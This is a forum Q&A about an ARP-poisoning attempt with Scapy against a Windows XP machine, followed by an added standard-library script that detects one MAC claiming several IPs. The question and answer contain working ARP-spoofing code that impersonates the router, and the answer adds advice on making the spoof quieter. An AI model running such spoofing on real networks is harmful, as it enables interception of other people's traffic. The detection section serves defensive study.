user3016694

Reputation: 307

Scapy arp poisoning not working for me

I am attacking a Windows XP machine with Backtrack 5 using scapy.

Now that's my code:

#! /usr/bin/env python

from scapy.all import *

arp_p = ARP(op = 1, psrc = "192.168.0.1", pdst = "192.168.0.106", hwsrc = "00:0c:29:f0:2d:19", hwdst = "ff:ff:ff:ff:ff:ff")
send(arp_p)

The code above actually sends two packets for some reason. One time my backtrack mac is asking:

who has 192.168.0.106 (Victim's IP)? Tell 192.168.0.108 (Backtrack's IP - NOT SUPPOSED TO BE!).

Then he gets the "is at" answer from the victim.

And the second time my backtrack's mac is asking:

who has 192.168.0.106 (Victim's IP)? Tell 192.168.0.1 (The router's IP).

Then he gets the "is at" answer from the victim again.

Then the victim's ARP table has two lines of the same mac but different IPs, one is the Backtrack's real IP and the second is the router's IP.

Why is this happening?

Upvotes: 0

Views: 1907

Answers (1)

Pierre

Reputation: 6237

The first ARP packet you see comes from Scapy, because it wants to fill the Ether frame with the Victim's MAC address before send()-ing your ARP packet.

If you don't want that to happen, try (sendp sends at layer 2):

>>> sendp(Ether(dst=ETHER_BROADCAST)/ARP(psrc = "192.168.0.1", pdst = "192.168.0.106"))

You can replace ETHER_BROADCAST with your victim's MAC address, that's less "noisy".

Upvotes: 1
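
Added example, not part of the question or the answer: the symptom described in the question (one MAC address appearing against two IP addresses, one of them the router's) is what a defender watches for on the wire. This sketch parses raw Ethernet/ARP frames with the standard library only and reports every sender MAC that claimed more than one IP; the sample frames are constructed from the addresses in the question, and the MAC for 192.168.0.106 is an assumed placeholder.

```python
import struct
from collections import defaultdict

def hw(s):                       # "aa:bb:.." -> 6 bytes
    return bytes.fromhex(s.replace(":", ""))

def ip4(s):                      # "a.b.c.d" -> 4 bytes
    return bytes(int(x) for x in s.split("."))

def frame(dst, op, sha, spa, tha, tpa):
    """Build a constructed Ethernet/ARP frame for the sample capture."""
    eth = hw(dst) + hw(sha) + struct.pack("!H", 0x0806)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)
    return eth + arp + hw(sha) + ip4(spa) + hw(tha) + ip4(tpa)

def parse_arp(raw):
    """Return (op, sender_mac, sender_ip) for an IPv4-over-Ethernet ARP frame, else None."""
    if len(raw) < 42 or raw[12:14] != b"\x08\x06":
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", raw[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    smac = ":".join(f"{b:02x}" for b in raw[22:28])
    sip = ".".join(str(b) for b in raw[28:32])
    return op, smac, sip

def find_conflicts(frames):
    """Return {mac: [ips]} for every sender MAC that claimed more than one IP."""
    claims = defaultdict(set)
    for raw in frames:
        parsed = parse_arp(raw)
        if parsed and parsed[2] != "0.0.0.0":   # ARP probes claim no address
            claims[parsed[1]].add(parsed[2])
    return {m: sorted(ips) for m, ips in claims.items() if len(ips) > 1}

BCAST, ZERO = "ff:ff:ff:ff:ff:ff", "00:00:00:00:00:00"
SENDER = "00:0c:29:f0:2d:19"     # hwsrc from the question
HOST_106 = "00:11:22:33:44:55"   # constructed MAC for 192.168.0.106

SAMPLE = [  # constructed capture mirroring the four packets described
    frame(BCAST, 1, SENDER, "192.168.0.108", ZERO, "192.168.0.106"),
    frame(SENDER, 2, HOST_106, "192.168.0.106", SENDER, "192.168.0.108"),
    frame(BCAST, 1, SENDER, "192.168.0.1", BCAST, "192.168.0.106"),
    frame(SENDER, 2, HOST_106, "192.168.0.106", SENDER, "192.168.0.1"),
]

if __name__ == "__main__":
    for mac, ips in find_conflicts(SAMPLE).items():
        print(f"ALERT {mac} claims {', '.join(ips)}")
```

A MAC with several IPs is not always hostile (multi-homed hosts and gateways with secondary addresses do it too), so an alert is worth comparing against the known gateway MAC before acting on it.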
